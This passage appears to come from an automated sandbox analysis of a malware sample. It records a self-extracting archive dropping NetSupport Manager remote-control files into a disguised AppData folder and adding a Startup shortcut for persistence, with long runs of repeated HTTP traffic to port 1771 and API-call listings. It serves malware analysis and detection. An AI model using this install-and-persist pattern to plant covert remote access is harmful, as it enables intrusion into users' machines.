                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                Source: autorunins.ini.lnk.0.drLNK file: ..\..\..\..\..\SuportUpWin\client32.exe
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile written: C:\Users\user\AppData\Roaming\SuportUpWin\client32.iniJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: hkpqXovZtS.exeStatic file information: File size 3338375 > 1048576
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile opened: C:\Users\user\AppData\Roaming\SuportUpWin\msvcr100.dllJump to behavior
                                Source: hkpqXovZtS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 0000000B.00000002.1372400954.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: AudioCapture.dll.0.dr
                                Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: hkpqXovZtS.exe
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: client32.exe, 00000003.00000002.3711306367.0000000070222000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000B.00000002.1372539158.0000000070222000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000003.00000002.3711407321.0000000070235000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 0000000B.00000002.1372612091.0000000070235000.00000002.00000001.01000000.00000009.sdmp, pcicapi.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1250\1250\client32\release_unicode\client32.pdb source: client32.exe, 00000003.00000002.3698855636.0000000000652000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 00000003.00000000.1266608605.0000000000652000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000B.00000000.1370270714.0000000000652000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000B.00000002.1371512576.0000000000652000.00000002.00000001.01000000.00000007.sdmp, client32.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.dr
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0040CA7B LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040CA7B
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile created: C:\Users\user\AppData\Roaming\__tmp_rar_sfx_access_check_6140921Jump to behavior
                                Source: PCICL32.DLL.0.drStatic PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_004548AB pushad ; iretd 0_2_004548C9
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_00464B59 push edx; ret 0_2_00464B5A
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0041EDA1 push ecx; ret 0_2_0041EDB4
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_00465270 push edi; iretd 0_2_00465271
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0044F394 push ds; ret 0_2_0044F447
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_0044F421 push ds; ret 0_2_0044F447
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_00419784 push eax; ret 0_2_004197A2
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_00467D2C push ds; iretd 0_2_00467D45
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeCode function: 0_2_02295A15 pushad ; ret 0_2_02295A18
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1116FF15 push ecx; ret 3_2_1116FF28
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1116AE09 push ecx; ret 3_2_1116AE1C
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CEE2D80 push eax; ret 3_2_6CEE2D9E
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CEF0995 push ecx; ret 3_2_6CEF09A8
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF0A6AA push EF3FEFD4h; iretd 3_2_6CF0A6B1
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_6CF09CD8 pushad ; iretd 3_2_6CF09CE6
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1116FF15 push ecx; ret 11_2_1116FF28
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1116AE09 push ecx; ret 11_2_1116AE1C
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CEE2D80 push eax; ret 11_2_6CEE2D9E
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CEF0995 push ecx; ret 11_2_6CEF09A8
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF0A6AA push EF3FEFD4h; iretd 11_2_6CF0A6B1
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CF09CD8 pushad ; iretd 11_2_6CF09CE6
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_6CEFBF60 push ecx; ret 11_2_6CEFBF73
                                Source: hkpqXovZtS.exeStatic PE information: section name: .text entropy: 7.220223726792702
                                Source: msvcr100.dll.0.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile created: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeJump to dropped file
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile created: C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile created: C:\Users\user\AppData\Roaming\SuportUpWin\PCICL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile created: C:\Users\user\AppData\Roaming\SuportUpWin\AudioCapture.dllJump to dropped file
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile created: C:\Users\user\AppData\Roaming\SuportUpWin\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile created: C:\Users\user\AppData\Roaming\SuportUpWin\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile created: C:\Users\user\AppData\Roaming\SuportUpWin\PCICHEK.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile created: C:\Users\user\AppData\Roaming\SuportUpWin\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile created: C:\Users\user\AppData\Roaming\SuportUpWin\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autorunins.ini.lnkJump to behavior
                                Source: C:\Users\user\Desktop\hkpqXovZtS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autorunins.ini.lnkJump to behavior
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,3_2_11128B10

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 1771
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,3_2_11139ED0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,3_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11113380 IsIconic,GetTickCount,3_2_11113380
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,3_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,3_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,3_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,3_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,3_2_11025A90
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,3_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,3_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,3_2_11113FA0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,3_2_11025EE0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,3_2_1115BEE0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,3_2_110241A0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 3_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,3_2_11024880
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,11_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_11113380 IsIconic,GetTickCount,11_2_11113380
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,11_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,11_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,11_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,11_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,11_2_11025A90
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,11_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exeCode function: 11_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,11_2_1115BAE0
